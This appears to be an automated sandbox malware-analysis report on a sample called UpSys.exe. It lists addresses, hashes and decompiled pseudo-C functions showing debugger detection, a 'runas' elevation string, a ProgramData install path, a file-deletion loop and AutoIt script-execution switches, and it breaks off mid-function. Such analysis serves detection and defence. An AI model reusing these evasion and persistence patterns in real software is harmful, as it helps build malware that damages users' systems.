                                                                                                                                                              0x1400227a4
                                                                                                                                                              0x1400227a9
                                                                                                                                                              0x1400227af
                                                                                                                                                              0x1400227b4
                                                                                                                                                              0x1400227b6
                                                                                                                                                              0x1400227bd
                                                                                                                                                              0x1400227c9
                                                                                                                                                              0x1400227d3
                                                                                                                                                              0x1400227e0
                                                                                                                                                              0x1400227e2
                                                                                                                                                              0x1400227ea
                                                                                                                                                              0x1400227f0
                                                                                                                                                              0x1400227f9
                                                                                                                                                              0x140022803
                                                                                                                                                              0x14002280b
                                                                                                                                                              0x140022811
                                                                                                                                                              0x14002281a
                                                                                                                                                              0x140022820
                                                                                                                                                              0x140022823
                                                                                                                                                              0x140022828
                                                                                                                                                              0x14002283a
                                                                                                                                                              0x14002283c
                                                                                                                                                              0x14002283f
                                                                                                                                                              0x140022844
                                                                                                                                                              0x140022846
                                                                                                                                                              0x140022848
                                                                                                                                                              0x14002284b
                                                                                                                                                              0x140022854
                                                                                                                                                              0x140022860
                                                                                                                                                              0x140022862
                                                                                                                                                              0x14002286f
                                                                                                                                                              0x140022872
                                                                                                                                                              0x14002287c
                                                                                                                                                              0x1400228a3
                                                                                                                                                              0x1400228bc
                                                                                                                                                              0x1400228cf
                                                                                                                                                              0x1400228d5
                                                                                                                                                              0x1400228da
                                                                                                                                                              0x1400228e2
                                                                                                                                                              0x1400228eb
                                                                                                                                                              0x1400228f4
                                                                                                                                                              0x1400228ff
                                                                                                                                                              0x140022904
                                                                                                                                                              0x140022916
                                                                                                                                                              0x140022918
                                                                                                                                                              0x140022924
                                                                                                                                                              0x140022926
                                                                                                                                                              0x140022929
                                                                                                                                                              0x14002292d
                                                                                                                                                              0x140022939
                                                                                                                                                              0x140022947
                                                                                                                                                              0x140022949
                                                                                                                                                              0x140022956
                                                                                                                                                              0x140022959
                                                                                                                                                              0x140022963
                                                                                                                                                              0x14002298a
                                                                                                                                                              0x1400229a7
                                                                                                                                                              0x1400229ba
                                                                                                                                                              0x1400229c0
                                                                                                                                                              0x1400229c8
                                                                                                                                                              0x1400229ce
                                                                                                                                                              0x1400229d4
                                                                                                                                                              0x1400229e3
                                                                                                                                                              0x1400229e5
                                                                                                                                                              0x1400229f1
                                                                                                                                                              0x1400229f3
                                                                                                                                                              0x140022a03
                                                                                                                                                              0x140022a11
                                                                                                                                                              0x140022a13
                                                                                                                                                              0x140022a19
                                                                                                                                                              0x140022a2b
                                                                                                                                                              0x140022a3a
                                                                                                                                                              0x140022a41
                                                                                                                                                              0x140022a4c
                                                                                                                                                              0x140022a51
                                                                                                                                                              0x140022a57
                                                                                                                                                              0x140022a5c
                                                                                                                                                              0x140022a69
                                                                                                                                                              0x140022a7a
                                                                                                                                                              0x140022a8d
                                                                                                                                                              0x140022a9c
                                                                                                                                                              0x140022a9e
                                                                                                                                                              0x140022aa5
                                                                                                                                                              0x140022aa7
                                                                                                                                                              0x140022aa9
                                                                                                                                                              0x140022ab4
                                                                                                                                                              0x140022abc
                                                                                                                                                              0x140022ac8
                                                                                                                                                              0x140022ace
                                                                                                                                                              0x140022ad7
                                                                                                                                                              0x140022ae1
                                                                                                                                                              0x140022ae7
                                                                                                                                                              0x140022aef
                                                                                                                                                              0x140022af7
                                                                                                                                                              0x140022afc
                                                                                                                                                              0x140022b04
                                                                                                                                                              0x140022b0b
                                                                                                                                                              0x140022b10
                                                                                                                                                              0x140022b1c
                                                                                                                                                              0x140022b26
                                                                                                                                                              0x140022b2d
                                                                                                                                                              0x140022b33
                                                                                                                                                              0x140022b38
                                                                                                                                                              0x140022b3e
                                                                                                                                                              0x140022b43
                                                                                                                                                              0x140022b46
                                                                                                                                                              0x140022b79

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __doserrno_errno
                                                                                                                                                              • String ID: U
                                                                                                                                                              • API String ID: 921712934-4171548499
                                                                                                                                                              • Opcode ID: e3f5e56f98e714852cbc5af4dc40e8b82550afba72b277d5ce9564f99307f555
                                                                                                                                                              • Instruction ID: 9027733363c8b498f3cdac297bc783a2128c760ac815851859eb011c26a73db9
                                                                                                                                                              • Opcode Fuzzy Hash: e3f5e56f98e714852cbc5af4dc40e8b82550afba72b277d5ce9564f99307f555
                                                                                                                                                              • Instruction Fuzzy Hash: B912043220864196EB229FA6D4443EAB7A0F79C7C4F54451AFF8A47AB9DF3DC845CB10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400121F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 142windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E000000011400121F0(void* __edx, void* __ebp, void* __rax, long long __rbx, void* __rdx, long long __rdi, void* __rbp, void* __r8, void* __r10, void* __r11, void* __r12, void* __r13, long long _a8, long long _a16, char _a24) {
				void* _v536;
				void* _v1064;
				long long _v1112;
				void* __rsi;
				intOrPtr _t15;
				void* _t16;
				void* _t19;
				void* _t32;
				long long _t43;
				void* _t70;

				_t70 = __r11;
				_t64 = __rbp;
				_t43 = __rbx;
				_t32 = __ebp;
				_t63 = __rdx;
				GetCurrentDirectoryW(??, ??);
				E000000011400021D0(__edx, __rax, __rbx, __rdx, __rbp); // executed
				if (IsDebuggerPresent() != 0) goto 0x4003b420;
				_t15 =  *0x400c5f48; // 0x4
				if (_t15 == 0) goto 0x4003b442;
				_a8 = _t43;
				_a16 = __rdi;
				dil = 0;
				if (_t15 == 1) goto 0x4003b45d;
				r9d =  *0x400b5498 & 0x000000ff;
				_v1112 =  &_a24;
				_a24 = dil;
				_t16 = E00000001140015150(_t43, 0x400c7ef0, 0x400c5f70, _t63, 0x400c5f48); // executed
				if (_t16 == 0) goto 0x4003b48e;
				 *0x400c5f4c =  *0x400c7ef0 & 0x000000ff;
				GetFullPathNameW(??, ??, ??, ??);
				r8d =  *0x400c5f48; // 0x4
				_t19 = E00000001140001380(_t43, 0x400c5f70); // executed
				if (_t19 != 0) goto 0x4003b49d;
				if (( *0x400c7ef1 & 0x000000ff) == 1) goto 0x4003b4c3;
				E00000001140015A40( &_a24, _t43, _t63); // executed
				E00000001140015960(); // executed
				if ( *0x400c5f4c != 0) goto 0x40012327;
				E000000011400129A0(_t43, 0x400c6b70, _t63, _t70);
				E000000011400072E0( *0x400c7ef1 & 0x000000ff, 0x104, 1, _t32, _t43, 0x400c6180, _t63, _t64, 0x400c5f40, __r10, _t70, __r12, __r13); // executed
				if ( *0x400c5f4c != 0) goto 0x4001234d;
				E00000001140012AD0(0x400c6b70);
				E00000001140013CA0(_t43, 0x400c7ef0, 0x400c5f70, _t63, _t64); // executed
				return SetCurrentDirectoryW(??);
			}













                                                                                                                                                              0x1400121f0
                                                                                                                                                              0x1400121f0
                                                                                                                                                              0x1400121f0
                                                                                                                                                              0x1400121f0
                                                                                                                                                              0x1400121f9
                                                                                                                                                              0x140012206
                                                                                                                                                              0x140012216
                                                                                                                                                              0x140012223
                                                                                                                                                              0x140012229
                                                                                                                                                              0x140012231
                                                                                                                                                              0x140012237
                                                                                                                                                              0x14001223f
                                                                                                                                                              0x140012247
                                                                                                                                                              0x14001224d
                                                                                                                                                              0x140012253
                                                                                                                                                              0x140012278
                                                                                                                                                              0x14001227d
                                                                                                                                                              0x140012285
                                                                                                                                                              0x14001228c
                                                                                                                                                              0x1400122bb
                                                                                                                                                              0x1400122c1
                                                                                                                                                              0x1400122cf
                                                                                                                                                              0x1400122e4
                                                                                                                                                              0x1400122eb
                                                                                                                                                              0x1400122f4
                                                                                                                                                              0x140012301
                                                                                                                                                              0x14001230d
                                                                                                                                                              0x140012319
                                                                                                                                                              0x140012322
                                                                                                                                                              0x140012333
                                                                                                                                                              0x14001233f
                                                                                                                                                              0x140012348
                                                                                                                                                              0x140012354
                                                                                                                                                              0x14001237c

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Load$CurrentDirectoryIconNameWindow$CreateFileFullModulePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                                                                                                              • String ID: $C:\ProgramData\UpSys.exe$runas
                                                                                                                                                              • API String ID: 1782616709-553812972
                                                                                                                                                              • Opcode ID: 43dce2e765e4ae4462819a09501b880688119ca328fea58507bedd247ffe1afd
                                                                                                                                                              • Instruction ID: 15a936b02669ffbeed52465ab92a18baa28ea67533fd23afe2a9f433cb727cd1
                                                                                                                                                              • Opcode Fuzzy Hash: 43dce2e765e4ae4462819a09501b880688119ca328fea58507bedd247ffe1afd
                                                                                                                                                              • Instruction Fuzzy Hash: F7715872118B8691FA2AEB62E8507DA2364F74D3D9F840016F78D076B6DF7DC68AC700
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 000000014002527C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 106COMMONLIBRARYCODECrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E0000000114002527C(signed int __ecx, void* __edi, signed int* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __rbp, void* __r8, signed int _a8, long long _a16, long long _a24) {
				long long _v56;
				void* __rdi;
				void* __r12;
				void* _t34;
				signed int _t35;
				signed int _t45;
				void* _t59;
				void* _t63;
				signed int* _t69;
				signed int* _t70;
				long long _t71;
				signed long long _t85;
				void* _t86;
				signed long long _t88;

				_t83 = __r8;
				_t79 = __rbp;
				_t77 = __rsi;
				_t74 = __rdx;
				_t73 = __rcx;
				_t71 = __rbx;
				_t59 = __edi;
				_a16 = __rbx;
				_a24 = __rsi;
				_a8 = __ecx;
				_t86 = __rdx;
				_t76 = __ecx;
				if (__edi != 0xfffffffe) goto 0x400252c1;
				E0000000114001EB04(__edi - 0xfffffffe, __rax);
				 *__rax = 0;
				E0000000114001EAE4(__edi - 0xfffffffe, __rax);
				 *__rax = 9;
				goto 0x400253d6;
				if (__edi < 0) goto 0x400253ad;
				_t63 = _t59 -  *0x400c88bc; // 0x20
				if (_t63 >= 0) goto 0x400253ad;
				_t88 = __ecx >> 5;
				r12d = r12d & 0x0000001f;
				_t85 = __ecx * 0x58;
				_t69 =  *((intOrPtr*)(0x400c88c0 + _t88 * 8));
				if (_t63 != 0) goto 0x4002532d;
				E0000000114001EB04(_t63, _t69);
				 *_t69 = 0;
				E0000000114001EAE4(_t63, _t69);
				 *_t69 = 9;
				_v56 = __rbx;
				r9d = 0;
				r8d = 0;
				E0000000114001EA14(_t69, __rbx, __rcx, __rdx, __rsi, __rbp, __r8);
				goto 0x400253d6;
				if (r8d - 0x7fffffff < 0) goto 0x40025368;
				E0000000114001EB04(r8d - 0x7fffffff < 0, _t69);
				 *_t69 = 0;
				E0000000114001EAE4(r8d - 0x7fffffff < 0, _t69);
				 *_t69 = 0x16;
				_v56 = _t71;
				r9d = 0;
				r8d = 0;
				E0000000114001EA14(_t69, _t71, _t73, _t74, _t77, _t79, _t83);
				goto 0x400253d6;
				_t34 = E00000001140022130(0, __edi, _t71, _t76, _t77, _t85);
				_t70 =  *((intOrPtr*)(0x400c88c0 + _t88 * 8));
				if (( *(_t70 + _t85 + 8) & 0x00000001) == 0) goto 0x4002538d;
				_t35 = E00000001140024AFC(_t34, _t59, r8d, _t86, _t83); // executed
				_t45 = _t35;
				goto 0x400253a2;
				E0000000114001EAE4( *(_t70 + _t85 + 8) & 0x00000001, _t70);
				 *_t70 = 9;
				E0000000114001EB04( *(_t70 + _t85 + 8) & 0x00000001, _t70);
				 *_t70 = _t45;
				E000000011400221D8();
				goto 0x400253d6;
				E0000000114001EB04( *(_t70 + _t85 + 8) & 0x00000001, _t70);
				 *_t70 = _t45 | 0xffffffff;
				E0000000114001EAE4( *(_t70 + _t85 + 8) & 0x00000001, _t70);
				 *_t70 = 9;
				_v56 = _t71;
				r9d = 0;
				r8d = 0;
				return E0000000114001EA14(_t70, _t71, _t73, _t86, _t77, _t79, _t83) | 0xffffffff;
			}

















                                                                                                                                                              0x14002527c
                                                                                                                                                              0x14002527c
                                                                                                                                                              0x14002527c
                                                                                                                                                              0x14002527c
                                                                                                                                                              0x14002527c
                                                                                                                                                              0x14002527c
                                                                                                                                                              0x14002527c
                                                                                                                                                              0x14002527c
                                                                                                                                                              0x140025281
                                                                                                                                                              0x140025286
                                                                                                                                                              0x14002529a
                                                                                                                                                              0x14002529d
                                                                                                                                                              0x1400252a3
                                                                                                                                                              0x1400252a5
                                                                                                                                                              0x1400252ac
                                                                                                                                                              0x1400252ae
                                                                                                                                                              0x1400252b3
                                                                                                                                                              0x1400252bc
                                                                                                                                                              0x1400252c5
                                                                                                                                                              0x1400252cb
                                                                                                                                                              0x1400252d1
                                                                                                                                                              0x1400252dd
                                                                                                                                                              0x1400252e8
                                                                                                                                                              0x1400252ec
                                                                                                                                                              0x1400252f0
                                                                                                                                                              0x1400252fd
                                                                                                                                                              0x1400252ff
                                                                                                                                                              0x140025304
                                                                                                                                                              0x140025306
                                                                                                                                                              0x14002530b
                                                                                                                                                              0x140025311
                                                                                                                                                              0x140025316
                                                                                                                                                              0x140025319
                                                                                                                                                              0x140025320
                                                                                                                                                              0x140025328
                                                                                                                                                              0x14002533b
                                                                                                                                                              0x14002533d
                                                                                                                                                              0x140025342
                                                                                                                                                              0x140025344
                                                                                                                                                              0x140025349
                                                                                                                                                              0x14002534f
                                                                                                                                                              0x140025354
                                                                                                                                                              0x140025357
                                                                                                                                                              0x14002535e
                                                                                                                                                              0x140025366
                                                                                                                                                              0x14002536a
                                                                                                                                                              0x140025370
                                                                                                                                                              0x14002537a
                                                                                                                                                              0x140025384
                                                                                                                                                              0x140025389
                                                                                                                                                              0x14002538b
                                                                                                                                                              0x14002538d
                                                                                                                                                              0x140025392
                                                                                                                                                              0x140025398
                                                                                                                                                              0x14002539d
                                                                                                                                                              0x1400253a4
                                                                                                                                                              0x1400253ab
                                                                                                                                                              0x1400253ad
                                                                                                                                                              0x1400253b2
                                                                                                                                                              0x1400253b4
                                                                                                                                                              0x1400253b9
                                                                                                                                                              0x1400253bf
                                                                                                                                                              0x1400253c4
                                                                                                                                                              0x1400253c7
                                                                                                                                                              0x1400253ed

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __doserrno_errno
                                                                                                                                                              • String ID: C:\ProgramData\UpSys.exe
                                                                                                                                                              • API String ID: 921712934-3875041276
                                                                                                                                                              • Opcode ID: cf221056f01de8ed8bb1cb4a9ab62eaba0ffc810a55163c5fa7f5fb87fc6a80d
                                                                                                                                                              • Instruction ID: 8e86f72051d5972c399217a316ada81a093fe9cee82b143a001040e8db392613
                                                                                                                                                              • Opcode Fuzzy Hash: cf221056f01de8ed8bb1cb4a9ab62eaba0ffc810a55163c5fa7f5fb87fc6a80d
                                                                                                                                                              • Instruction Fuzzy Hash: 2341E43221429086F723AF77988179E3561BB887E0F55561DBB210BBF2CFB9D801C706
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 000000014005A0D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 54%
                                                                                                                                                              			E0000000114005A0D0(void* __edx, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, void* __r9, void* __r10, void* __r11, long long _a8, char _a16, long long _a24, long long _a32) {
				void* _v8;
				char _v536;
				char _v1064;
				char _v1592;
				char _v2140;
				signed char _v2184;
				char _v2712;
				long long _v2728;
				void* _t31;
				int _t38;
				int _t39;
				long long _t52;

				_t53 = __rbx;
				_a8 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				bpl = 0;
				E000000011400151D0(__rax, __rbx,  &_v2712);
				_t31 = E00000001140040EC0(); // executed
				if (_t31 == 0) goto 0x4005a115;
				E00000001140016E20( &_v2712, L"\\*.*");
				_t52 =  &_v536;
				_v2728 = _t52;
				E0000000114001823C(_t53,  &_v2712,  &_a16, __rsi,  &_v1592,  &_v1064, __r10, __r11);
				FindFirstFileW(??, ??); // executed
				dil = 1;
				if (_t52 == 0xffffffff) goto 0x4005a1d6;
				if (dil != 1) goto 0x4005a1d6;
				if ((_v2184 & 0x00000010) != 0) goto 0x4005a1bc;
				bpl = dil;
				E00000001140016E4C( &_v2712,  &_a16);
				E00000001140016E20( &_v2712,  &_v1592);
				E00000001140016E20( &_v2712,  &_v2140);
				_t38 = DeleteFileW(??); // executed
				if (_t38 != 1) goto 0x4005a1d9;
				_t39 = FindNextFileW(??, ??); // executed
				if (_t39 != 0) goto 0x4005a163;
				dil = 0;
				goto 0x4005a163;
				FindClose(??);
				return bpl;
			}















                                                                                                                                                              0x14005a0d0
                                                                                                                                                              0x14005a0d0
                                                                                                                                                              0x14005a0d5
                                                                                                                                                              0x14005a0da
                                                                                                                                                              0x14005a0ee
                                                                                                                                                              0x14005a0f1
                                                                                                                                                              0x14005a0fb
                                                                                                                                                              0x14005a102
                                                                                                                                                              0x14005a110
                                                                                                                                                              0x14005a115
                                                                                                                                                              0x14005a13a
                                                                                                                                                              0x14005a13f
                                                                                                                                                              0x14005a151
                                                                                                                                                              0x14005a157
                                                                                                                                                              0x14005a161
                                                                                                                                                              0x14005a167
                                                                                                                                                              0x14005a171
                                                                                                                                                              0x14005a180
                                                                                                                                                              0x14005a183
                                                                                                                                                              0x14005a195
                                                                                                                                                              0x14005a1a7
                                                                                                                                                              0x14005a1b1
                                                                                                                                                              0x14005a1ba
                                                                                                                                                              0x14005a1c7
                                                                                                                                                              0x14005a1cf
                                                                                                                                                              0x14005a1d1
                                                                                                                                                              0x14005a1d4
                                                                                                                                                              0x14005a1dc
                                                                                                                                                              0x14005a1fc

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Find$AttributesCloseDeleteFirstFullNameNextPath
                                                                                                                                                              • String ID: \*.*
                                                                                                                                                              • API String ID: 1127339523-1173974218
                                                                                                                                                              • Opcode ID: be57b4cbe4b717e5f728a61af55abce9d9bcef921b10db37add219673fe16067
                                                                                                                                                              • Instruction ID: 30e4fdbee1598f8a5c17c26d597cc52359c97b9c7d2eb2e500b3014dea352947
                                                                                                                                                              • Opcode Fuzzy Hash: be57b4cbe4b717e5f728a61af55abce9d9bcef921b10db37add219673fe16067
                                                                                                                                                              • Instruction Fuzzy Hash: 2931BF32228A8595EA21DB12E4807DE6365F7897D4F805112FB9E03AA8EF7DC649CB00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400850DC Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: NameUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                                              • Opcode ID: d2011e6d5a9bf48d5f39ee28a414f5bdce58d32002bb37e26327d54615a38b5e
                                                                                                                                                              • Instruction ID: 496368807edacb6a91851c2efb1a51071c3eeab2290a829a8e4eee9d6807669c
                                                                                                                                                              • Opcode Fuzzy Hash: d2011e6d5a9bf48d5f39ee28a414f5bdce58d32002bb37e26327d54615a38b5e
                                                                                                                                                              • Instruction Fuzzy Hash: D4C04C7710AAC5D9D7719F01E4847DD6361F7CC394F500001D389039A8DF79C198CB15
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400021D0 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 213COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 70%
                                                                                                                                                              			E000000011400021D0(void* __edx, intOrPtr* __rax, long long __rbx, void* __rdx, long long __rbp, char _a8, long long _a16, char _a24, long long _a32) {
				void* _v24;
				intOrPtr _v48;
				char _v96;
				char _v104;
				intOrPtr _v128;
				char _v136;
				char _v168;
				char _v184;
				void* __rdi;
				void* __rsi;
				signed char _t53;
				void* _t60;
				void* _t72;
				void* _t79;
				intOrPtr _t89;
				void* _t93;
				void* _t94;
				void* _t95;
				intOrPtr _t101;
				intOrPtr* _t105;
				intOrPtr* _t110;
				char* _t162;
				void* _t165;
				void* _t166;
				void* _t173;
				char* _t178;
				void* _t181;
				void* _t182;
				void* _t183;

				_t167 = __rbp;
				_t105 = __rax;
				_a16 = __rbx;
				_a32 = __rbp;
				_t107 = __rdx;
				E000000011400130E0(__rax, __rdx,  &_v104);
				_a8 = 0;
				E00000001140003100(__edx, _t105, __rdx,  &_v104, __rdx, _t166, __rbp, _t173);
				r8d = 0x104;
				GetModuleFileNameW(??, ??, ??);
				_t53 = E00000001140015120(_t93, 0x400c5f70); // executed
				 *0x400c5f40 = 0x400c5f70;
				E00000001140015590(_t105, _t107,  &_v136,  &_v96);
				E00000001140001D30(_t105, _t107,  &_v168, L"CMDLINERAW");
				_t94 =  *0x400c69e8 - _t166; // 0x0
				if (_t94 != 0) goto 0x40034e20;
				r9d = 1;
				E00000001140002610(E0000000114000F9E0(0, _t105, _t107, 0x400c69c8,  &_v168, _t167,  &_v136, _t181, _t182, _t183), _t107,  &_v168);
				E00000001140007A40(_t107,  &_v136, _t166);
				_v128 = 1;
				_v136 = 0;
				E00000001140001D30(_t105, _t107,  &_v168, L"CMDLINE");
				_t95 =  *0x400c69e8 - _t166; // 0x0
				if (_t95 != 0) goto 0x40034e34;
				r9d = 0x100; // executed
				_t60 = E0000000114000F9E0(0, _t105, _t107, 0x400c69c8,  &_v168, _t167,  &_v136, _t181, _t182, _t183); // executed
				E00000001140002610(_t60, _t107,  &_v168);
				E00000001140001D30(_t105, _t107,  &_v168, L"CMDLINE");
				_t178 =  &_a8;
				_v184 = 0;
				E00000001140002610(E00000001140010580(_t107,  &_v168, _t166,  &_a24, _t178), _t107,  &_v168);
				E00000001140001E60(E0000000114000FD50(_t105, _t107,  &_v168),  &_v104,  &_v168);
				if (E00000001140016D8C(_t105, L"/ErrorStdOut", _v168) == 0) goto 0x40034e48;
				if (E00000001140016D8C(_t105, L"/AutoIt3OutputDebug", _v168) == 0) goto 0x40034e6a;
				if (E00000001140016D8C(_t105, L"/AutoIt3ExecuteLine", _v168) == 0) goto 0x40034e8c;
				if (E00000001140016D8C(_t105, L"/AutoIt3ExecuteScript", _v168) != 0) goto 0x400023f0;
				if (bpl != 0) goto 0x40034eee;
				 *0x400c5f48 = 3;
				E00000001140001E60(_t70,  &_v104,  &_v168);
				_t72 = E00000001140016E4C(0x400c5f70, _v168);
				_t162 =  &_v168;
				_t89 = _v48 - 2;
				E00000001140001E60(_t72,  &_v104, _t162);
				_t101 =  *0x400c5f70; // 0x43
				if (_t101 == 0) goto 0x40034ef9;
				if (_t89 < 0) goto 0x40034f1b;
				r8d = _t165 + 1;
				E00000001140012B40(1, _a24, _t162, _t166,  &_a24, _t178);
				r9d = 0;
